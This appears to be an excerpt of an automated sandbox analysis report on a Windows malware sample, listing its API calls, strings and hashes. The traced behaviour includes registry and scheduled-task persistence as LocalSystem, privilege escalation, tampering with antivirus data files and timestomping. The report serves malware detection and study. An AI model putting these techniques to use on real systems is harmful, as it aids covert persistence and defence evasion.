                                                                                                                                                                                                            • API ID: ModuleProcess$AddressFileHandleHeapProc$CountTick$AtomCurrentGlobal$CopyDirectoryExistsExitFindFreeHeaderImageMoveNamePathQuerySystemValidateVirtualWindows_snprintf
                                                                                                                                                                                                            • String ID: %s_$.dat$IsWow64Process$Wed Jul 6 06:49:26 20111$\apppatch\$kernel32.dll$svchost.exe
                                                                                                                                                                                                            • API String ID: 4049655197-3112416296
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                              • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                              • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                              • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                              • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                              • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                              • Part of subcall function 00401E00: AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                              • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                              • Part of subcall function 00401E00: FindCloseChangeNotification.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                            • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                            • SetEndOfFile.KERNELBASE(00000000), ref: 004010F6
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401129
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Security$DescriptorToken$ChangeCloseCurrentFindNotificationOpenProcessThread$AdjustConvertCreateErrorFreeHandleInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                            • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                            • API String ID: 1779852708-820036962
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040255C
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004025C0
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004025E3
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004025F8
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 00402604
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402613
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 0040261F
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040262E
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040263A
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402649
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402655
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402664
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00402667
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$PointerWrite$CloseCreateFolderHandlePath
                                                                                                                                                                                                            • String ID: \PrevxCSI\csidb.csi
                                                                                                                                                                                                            • API String ID: 606440919-2829233815
                                                                                                                                                                                                            • Opcode ID: 79a3c48366173e2e4432591fd9d0211125a55660129729a41d6644ffa549504a
                                                                                                                                                                                                            • Instruction ID: 8b448ea0795f31fda95dadee176b54ca291314fb6d6361d02f59f031212173a5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79a3c48366173e2e4432591fd9d0211125a55660129729a41d6644ffa549504a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D93128716842187EF311EB90DC9AFEE7768EB89B00F104165F304AA1D0DBF16A45CBE9
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                              • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                              • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                              • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                              • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                              • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                              • Part of subcall function 00401E00: AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                              • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                              • Part of subcall function 00401E00: FindCloseChangeNotification.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                            • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                            • SetEndOfFile.KERNELBASE(00000000), ref: 004010F6
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401129
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Security$DescriptorToken$ChangeCloseCurrentFindNotificationOpenProcessThread$AdjustConvertCreateErrorFreeHandleInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                            • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                            • API String ID: 1779852708-820036962
                                                                                                                                                                                                            • Opcode ID: ed4ffb2dba8d29d9f73b1762ba96064b0f1017704a5a4d581a31cc202295fe74
                                                                                                                                                                                                            • Instruction ID: f59e5f2c9003a6e204812eb1f8c7eb33969ee6ba3e941ca0e7e6302637e7b3a9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ed4ffb2dba8d29d9f73b1762ba96064b0f1017704a5a4d581a31cc202295fe74
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9781346150E3C06FE7138B609C68B963FB49F57700F1A41EBE680EB1E3D26C4849C366
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                              • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                              • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                              • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                              • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                              • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                              • Part of subcall function 00401E00: AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                              • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                              • Part of subcall function 00401E00: FindCloseChangeNotification.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                            • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                            • SetEndOfFile.KERNELBASE(00000000), ref: 004010F6
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401129
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Security$DescriptorToken$ChangeCloseCurrentFindNotificationOpenProcessThread$AdjustConvertCreateErrorFreeHandleInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                            • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                            • API String ID: 1779852708-820036962
                                                                                                                                                                                                            • Opcode ID: a7cc5cccd17c4c8d75918ffee1feed7c0f8f1c7f1eda389b3bae9a3494e8b2a5
                                                                                                                                                                                                            • Instruction ID: 0b24c45107c0befc32dd0ff84bd5674d64e160e2b6de00103b139920790b26b7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7cc5cccd17c4c8d75918ffee1feed7c0f8f1c7f1eda389b3bae9a3494e8b2a5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 874152B5600208BBE7209B94DD49FAF7BBDEB89741F144026FB04FA2D0D7B49941C7A8
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegCreateKeyExA.KERNELBASE(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,00000000), ref: 0040296B
                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 00402986
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 00402993
                                                                                                                                                                                                            • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 004029B0
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 004029CB
                                                                                                                                                                                                            • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000000,00000000,00000102,00000000,00000000,00000000), ref: 00402A1A
                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(00000000,userinit,00000000,00000001,?,?), ref: 00402A3E
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(00000000), ref: 00402A4D
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00402A57
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • software\microsoft\windows nt\currentversion\winlogon, xrefs: 00402953
                                                                                                                                                                                                            • software\microsoft\windows\currentversion\run, xrefs: 00402A10
                                                                                                                                                                                                            • userinit, xrefs: 00402A38
                                                                                                                                                                                                            • SystemDrive, xrefs: 00402981
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Create$BackslashCloseEnvironmentFlushInformationPathValueVariableVolume_snprintf
                                                                                                                                                                                                            • String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                            • API String ID: 3547530944-2324515132
                                                                                                                                                                                                            • Opcode ID: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                            • Instruction ID: cfc36ad3083988d5491cb46672b4500e56a1c5dd6b6f1e6a0940d5df759a06a8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F93147B5740305BBE720DB54DE4AFEA777CDB95B00F204155FB44BA1C0DAF4AA448BA8
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 004014C8
                                                                                                                                                                                                            • memset.MSVCRT ref: 004014EE
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,00402CFF,00000104,?,?,?,00000000,00000000,00000000), ref: 00401506
                                                                                                                                                                                                            • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00401529
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040154A
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00401557
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040156E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0040157B
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$CloseInformationmemset$CreateProcesslstrcpyn
                                                                                                                                                                                                            • String ID: D
                                                                                                                                                                                                            • API String ID: 2248944234-2746444292
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(\\?\globalroot\systemroot\system32\drivers\ntfs.sys,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C05
                                                                                                                                                                                                            • GetFileTime.KERNEL32(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?,?,?), ref: 00401C1F
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C35
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C46
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C62
                                                                                                                                                                                                            • SetFileTime.KERNELBASE(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?), ref: 00401C78
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C8E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C9F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • \\?\globalroot\systemroot\system32\drivers\ntfs.sys, xrefs: 00401C00
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileHandle$CloseCreateInformationTime
                                                                                                                                                                                                            • String ID: \\?\globalroot\systemroot\system32\drivers\ntfs.sys
                                                                                                                                                                                                            • API String ID: 1046229350-2760794270
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(00401CB0,?,0000001C), ref: 004012DF
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 004012F5
                                                                                                                                                                                                            • PathFileExistsA.KERNELBASE(?), ref: 00401302
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?,00000000), ref: 00401319
                                                                                                                                                                                                            • GetTempFileNameA.KERNELBASE(?,00000000,00000000,?), ref: 00401331
                                                                                                                                                                                                            • MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0040134D
                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(?,00000000), ref: 0040135C
                                                                                                                                                                                                            • DeleteFileA.KERNELBASE(?), ref: 00401369
                                                                                                                                                                                                            • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040137D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$MoveNamePathTemp$AttributesDeleteExistsModuleQueryVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2787354276-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402468
                                                                                                                                                                                                            • MoveFileA.KERNEL32(?,?), ref: 0040252F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileFolderMovePath
                                                                                                                                                                                                            • String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
                                                                                                                                                                                                            • API String ID: 1404575960-1083204512
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FreeLibrary.KERNELBASE(00000000), ref: 004021AC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                                                            • String ID: v-@
                                                                                                                                                                                                            • API String ID: 3664257935-4190885519
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 004035AE
                                                                                                                                                                                                            • memset.MSVCRT ref: 004035CE
                                                                                                                                                                                                            • memset.MSVCRT ref: 004035EE
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 004035F6
                                                                                                                                                                                                            • GetVersionExA.KERNEL32 ref: 00403611
                                                                                                                                                                                                              • Part of subcall function 004034C0: GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                              • Part of subcall function 004034C0: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                              • Part of subcall function 004034C0: OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                              • Part of subcall function 004034C0: GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                              • Part of subcall function 004034C0: CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00403655
                                                                                                                                                                                                            • _snwprintf.MSVCRT ref: 0040366E
                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 004036CB
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 00403717
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 0040371E
                                                                                                                                                                                                            • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                            • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • \\?\globalroot\systemroot\system32\tasks\, xrefs: 00403597
                                                                                                                                                                                                            • <Actions , xrefs: 0040380A
                                                                                                                                                                                                            • 00-->, xrefs: 0040383F
                                                                                                                                                                                                            • <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> , xrefs: 00403574
                                                                                                                                                                                                            • task%d, xrefs: 0040365C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Filememset$Process$HeapTokenVersion_snwprintf$AdminAllocCloseCountCreateCurrentHandleInformationModuleNameOpenPointerSizeTickUser
                                                                                                                                                                                                            • String ID: <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> $00-->$<Actions $\\?\globalroot\systemroot\system32\tasks\$task%d
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,76E95430,00000000,?), ref: 00401923
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                            • memset.MSVCRT ref: 00401963
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                            • memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                            • memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                            • CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
